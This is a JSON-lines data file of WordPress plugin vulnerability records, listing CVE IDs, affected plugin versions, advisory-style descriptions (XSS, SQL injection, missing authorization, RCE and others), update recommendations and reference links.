{"CVE_ID":"CVE-2024-1166","slug":"image-hover-effects-addon-for-elementor","versionImpact":"1.4.1","versionEndExcluding":"1.4.2","description":"The Image Hover Effects \u2013 Elementor Addon plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Image Hover Effects Widget in all versions up to, and including, 1.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3068751%40image-hover-effects-addon-for-elementor&new=3068751%40image-hover-effects-addon-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3068751%40image-hover-effects-addon-for-elementor&new=3068751%40image-hover-effects-addon-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d72a57f-9acc-43e4-af81-024bc6e0d3fd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d72a57f-9acc-43e4-af81-024bc6e0d3fd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12325","slug":"waymark","versionImpact":"1.4.1","versionEndExcluding":"1.4.2","description":"The Waymark plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018content\u2019 parameter in all versions up to, and including, 1.4.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/waymark\\\/trunk\\\/inc\\\/Admin\\\/Waymark_Settings.php#L1457\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/waymark\\\/trunk\\\/inc\\\/Admin\\\/Waymark_Settings.php#L1457\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/waymark\\\/trunk\\\/inc\\\/Admin\\\/Waymark_Settings.php#L1458\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/waymark\\\/trunk\\\/inc\\\/Admin\\\/Waymark_Settings.php#L1458\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/waymark\\\/trunk\\\/inc\\\/Admin\\\/Waymark_Settings.php#L1531\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/waymark\\\/trunk\\\/inc\\\/Admin\\\/Waymark_Settings.php#L1531\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/waymark\\\/trunk\\\/inc\\\/Admin\\\/Waymark_Settings.php#L1532\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/waymark\\\/trunk\\\/inc\\\/Admin\\\/Waymark_Settings.php#L1532\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205103\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3205103\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4f24b32-58a0-4b10-b8ff-65e574966b6e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4f24b32-58a0-4b10-b8ff-65e574966b6e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12100","slug":"bitcoin-lightning-publisher","versionImpact":"1.4.1","versionEndExcluding":"1.4.2","description":"The Bitcoin Lightning Publisher for WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.4.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bitcoin-lightning-publisher\\\/tags\\\/1.4.1\\\/includes\\\/db\\\/transactions.php#L212\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bitcoin-lightning-publisher\\\/tags\\\/1.4.1\\\/includes\\\/db\\\/transactions.php#L212\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3211584%40bitcoin-lightning-publisher&new=3211584%40bitcoin-lightning-publisher&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3211584%40bitcoin-lightning-publisher&new=3211584%40bitcoin-lightning-publisher&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d204ed58-efb2-4383-aa0f-cbad0bae4d02?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d204ed58-efb2-4383-aa0f-cbad0bae4d02?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-45636","slug":"wp-migration-duplicator","versionImpact":"1.4.1","versionEndExcluding":"1.4.2","description":"Missing Authorization vulnerability in WebToffee WordPress Backup & Migration allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WordPress Backup & Migration: from n\/a through 1.4.1.","recommendation":"Update to version 1.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-migration-duplicator\\\/vulnerability\\\/wordpress-wordpress-backup-migration-plugin-1-4-1-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-migration-duplicator\\\/vulnerability\\\/wordpress-wordpress-backup-migration-plugin-1-4-1-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-51372","slug":"hashbar-wp-notification-bar","versionEndExcluding":"1.4.2","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in HasThemes HashBar \u2013 WordPress Notification Bar allows Stored XSS.This issue affects HashBar \u2013 WordPress Notification Bar: from n\/a through 1.4.1.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/hashbar-wp-notification-bar\\\/wordpress-hashbar-wordpress-notification-bar-plugin-1-4-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/hashbar-wp-notification-bar\\\/wordpress-hashbar-wordpress-notification-bar-plugin-1-4-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11813","slug":"amin-chat-button","versionImpact":"1.4.1","versionEndExcluding":"1.4.2","description":"The Pulsating Chat Button plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.6. This is due to missing or incorrect nonce validation on the amin_chat_button_settings_page() function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/amin-chat-button\\\/trunk\\\/chat-button.php#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/amin-chat-button\\\/trunk\\\/chat-button.php#L24\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cea8295b-b4be-4a95-9137-ad2033a5169d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cea8295b-b4be-4a95-9137-ad2033a5169d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10114","slug":"woosidebars","versionImpact":"1.4.1","versionEndExcluding":"1.4.2","description":"A vulnerability, which was classified as problematic, has been found in WooSidebars Plugin up to 1.4.1 on WordPress. Affected by this issue is the function enable_custom_post_sidebars of the file classes\/class-woo-sidebars.php. The manipulation of the argument sendback leads to open redirect. The attack may be launched remotely. Upgrading to version 1.4.2 is able to address this issue. The patch is identified as 1ac6d6ac26e185673f95fc1ccc56a392169ba601. It is recommended to upgrade the affected component. VDB-230654 is the identifier assigned to this vulnerability.","recommendation":"Update to version 1.4.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/woosidebars\\\/commit\\\/1ac6d6ac26e185673f95fc1ccc56a392169ba601\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/woosidebars\\\/commit\\\/1ac6d6ac26e185673f95fc1ccc56a392169ba601\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230654\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230654\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.230654\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.230654\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3275","slug":"eroom-zoom-meetings-webinar","versionImpact":"1.4.18","versionEndExcluding":"1.4.19","description":"The eRoom \u2013 Zoom Meetings & Webinars plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.4.18 via the search_posts function. This makes it possible for authenticated attackers, with subscriber access and higher, to obtain post excerpts including those of draft and pending posts.","recommendation":"Update to version 1.4.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/60e0fd59-a69c-4ddf-80cd-4312d2689397?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/60e0fd59-a69c-4ddf-80cd-4312d2689397?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3068855%40eroom-zoom-meetings-webinar%2Ftrunk&old=3039151%40eroom-zoom-meetings-webinar%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3068855%40eroom-zoom-meetings-webinar%2Ftrunk&old=3039151%40eroom-zoom-meetings-webinar%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4977","slug":"index-wp-mysql-for-speed","versionImpact":"1.4.17","versionEndExcluding":"1.4.18","description":"The Index WP MySQL For Speed WordPress plugin before 1.4.18 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 1.4.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/89791a80-5cff-4a1a-8163-94b5be4081a5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/89791a80-5cff-4a1a-8163-94b5be4081a5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5618","slug":"modern-footnotes","versionImpact":"1.4.16","versionEndExcluding":"1.4.17","description":"The Modern Footnotes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode in versions up to, and including, 1.4.16 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.4.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2980695\\\/modern-footnotes\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2980695\\\/modern-footnotes\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c20c674f-54b5-470f-b470-07a63501eb4d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c20c674f-54b5-470f-b470-07a63501eb4d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12680","slug":"google-website-translator","versionImpact":"1.4.13","versionEndExcluding":"1.4.14","description":"The Prisna GWT  WordPress plugin before 1.4.14 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.4.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/28537fbc-3c2b-40c1-85f0-8b5f94eaad51\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/28537fbc-3c2b-40c1-85f0-8b5f94eaad51\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12679","slug":"google-website-translator","versionImpact":"1.4.13","versionEndExcluding":"1.4.14","description":"The Prisna GWT  WordPress plugin before 1.4.14 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.4.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7ca1438f-4269-4e34-be4a-766276a9f016\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7ca1438f-4269-4e34-be4a-766276a9f016\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4151","slug":"agile-store-locator","versionEndExcluding":"1.4.13","description":"The Store Locator WordPress plugin before 1.4.13 does not sanitise and escape an invalid nonce before outputting it back in an AJAX response, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c9d80aa4-a26d-4b3f-b7bf-9d2fb0560d7b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c9d80aa4-a26d-4b3f-b7bf-9d2fb0560d7b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5309","slug":"form-vibes","versionImpact":"1.4.12","versionEndExcluding":"1.4.13","description":"The Form Vibes \u2013 Database Manager for Forms plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a missing capability check on the fv_export_csv, reset_settings, save_settings, save_columns_settings, get_analytics_data, get_event_logs_data, delete_submissions, and get_submissions functions in all versions up to, and including, 1.4.12. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform multiple unauthorized actions. NOTE: This vulnerability is partially fixed in version 1.4.12.","recommendation":"Update to version 1.4.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aba88c4c-93a4-4c1c-b239-68b5fec87146?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aba88c4c-93a4-4c1c-b239-68b5fec87146?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3128705%40form-vibes&new=3128705%40form-vibes&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3128705%40form-vibes&new=3128705%40form-vibes&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5125","slug":"dd-post-carousel","versionImpact":"1.4.11","versionEndExcluding":"1.4.12","description":"The Custom Post Carousels with Owl WordPress plugin before 1.4.12 uses the featherlight library and makes use of the data-featherlight attribute without sanitizing before using it.","recommendation":"Update to version 1.4.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aaf9e3f8-b312-432d-a635-6fe89ff8d13f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aaf9e3f8-b312-432d-a635-6fe89ff8d13f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2384","slug":"woocommerce-pos","versionImpact":"1.4.11","versionEndExcluding":"1.4.12","description":"The WooCommerce POS plugin for WordPress is vulnerable to information disclosure in all versions up to, and including, 1.4.11. This is due to the plugin not properly verifying the authentication and authorization of the current user This makes it possible for authenticated attackers, with customer-level access and above, to view potentially sensitive information about other users by leveraging their order id","recommendation":"Update to version 1.4.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6b8ba69-aa8b-436f-990c-39e283f5d2f2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6b8ba69-aa8b-436f-990c-39e283f5d2f2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3053833%40woocommerce-pos&new=3053833%40woocommerce-pos&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3053833%40woocommerce-pos&new=3053833%40woocommerce-pos&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8514","slug":"google-website-translator","versionImpact":"1.4.11","versionEndExcluding":"1.4.12","description":"The Prisna GWT \u2013 Google Website Translator plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.4.11 via deserialization of untrusted input from the 'prisna_import' parameter. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 1.4.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4183c3f7-7794-45f3-8fad-b87ffec3639c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4183c3f7-7794-45f3-8fad-b87ffec3639c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/google-website-translator\\\/tags\\\/1.4.11\\\/classes\\\/admin.class.php#L267\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/google-website-translator\\\/tags\\\/1.4.11\\\/classes\\\/admin.class.php#L267\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3155285\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3155285\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1690","slug":"woo-wallet","versionImpact":"1.4.10","versionEndExcluding":"1.4.11","description":"The TeraWallet \u2013 Best WooCommerce Wallet System With Cashback Rewards, Partial Payment, Wallet Refunds plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the terawallet_export_user_search() function in all versions up to, and including, 1.4.10. This makes it possible for authenticated attackers, with subscriber-level access and above, to export a list of registered users and their emails.","recommendation":"Update to version 1.4.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18e24a2e-cbc6-4285-b846-bea513b6ff69?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18e24a2e-cbc6-4285-b846-bea513b6ff69?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3043412\\\/woo-wallet\\\/trunk\\\/includes\\\/class-woo-wallet-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3043412\\\/woo-wallet\\\/trunk\\\/includes\\\/class-woo-wallet-ajax.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5325","slug":"form-vibes","versionImpact":"1.4.10","versionEndExcluding":"1.4.11","description":"The Form Vibes plugin for WordPress is vulnerable to SQL Injection via the \u2018fv_export_data\u2019 parameter in all versions up to, and including, 1.4.10 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.4.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a3311097-d477-441e-9bf3-3f991a9b6af9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a3311097-d477-441e-9bf3-3f991a9b6af9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3115288\\\/form-vibes\\\/trunk\\\/inc\\\/classes\\\/query.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3115288\\\/form-vibes\\\/trunk\\\/inc\\\/classes\\\/query.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5545","slug":"motors-car-dealership-classified-listings","versionImpact":"1.4.9","versionEndExcluding":"1.4.11","description":"The Motors \u2013 Car Dealer, Classifieds & Listing plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the stm_edit_delete_user_car function in all versions up to, and including, 1.4.8. This makes it possible for unauthenticated attackers to unpublish arbitrary posts and pages.","recommendation":"Update to version 1.4.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62731e0e-8843-4f79-b887-c595fbefae26?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62731e0e-8843-4f79-b887-c595fbefae26?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3106579%40motors-car-dealership-classified-listings%2Ftrunk&old=3101090%40motors-car-dealership-classified-listings%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3106579%40motors-car-dealership-classified-listings%2Ftrunk&old=3101090%40motors-car-dealership-classified-listings%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-27618","slug":"agile-store-locator","versionEndExcluding":"1.4.10","description":"Auth. (editor+) Stored Cross-Site Scripting (XSS) vulnerability in AGILELOGIX Store Locator WordPress plugin <=\u00a01.4.9 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/agile-store-locator\\\/wordpress-store-locator-wordpress-plugin-1-4-9-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/agile-store-locator\\\/wordpress-store-locator-wordpress-plugin-1-4-9-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13808","slug":"xpro-elementor-addons-pro","versionImpact":"1.4.9","versionEndExcluding":"1.4.10","description":"The Xpro Elementor Addons - Pro plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.4.9 via the custom PHP widget. This is due to their only being client side controls when determining who can access the widget. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute code on the server.","recommendation":"Update to version 1.4.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/elementor.wpxpro.com\",\"name\":\"https:\\\/\\\/elementor.wpxpro.com\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0833e55f-22aa-44c9-aff6-1f3b74016e4c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0833e55f-22aa-44c9-aff6-1f3b74016e4c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6556","slug":"woocommerce-currency-switcher","versionImpact":"1.4.1.6","versionEndExcluding":"1.4.1.7","description":"The FOX \u2013 Currency Switcher Professional for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via currency options in all versions up to, and including, 1.4.1.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.4.1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8cb37019-33f6-4f72-adfc-befbfbf69e47?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8cb37019-33f6-4f72-adfc-befbfbf69e47?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-currency-switcher\\\/trunk\\\/classes\\\/smart-designer.php#L21\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-currency-switcher\\\/trunk\\\/classes\\\/smart-designer.php#L21\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-currency-switcher\\\/trunk\\\/classes\\\/smart-designer.php#L120\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-currency-switcher\\\/trunk\\\/classes\\\/smart-designer.php#L120\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3012135%40woocommerce-currency-switcher&new=3012135%40woocommerce-currency-switcher&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3012135%40woocommerce-currency-switcher&new=3012135%40woocommerce-currency-switcher&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36668","slug":"backup","versionEndExcluding":"1.4.1","description":"The JetBackup \u2013 WP Backup, Migrate & Restore plugin for WordPress is vulnerable to sensitive information disclosure in versions up to, and including, 1.4.0 due to a lack of proper capability checking on the backup_guard_get_manual_modal function called via an AJAX action. This makes it possible for subscriber-level attackers, and above, to invoke the function and obtain database table information.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2348984%40backup&new=2348984%40backup&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2348984%40backup&new=2348984%40backup&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e2a9d71-21ef-45a1-99ed-477066ce9620\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e2a9d71-21ef-45a1-99ed-477066ce9620\",\"refsource\":\"MISC\",\"tags\":[]}]"}
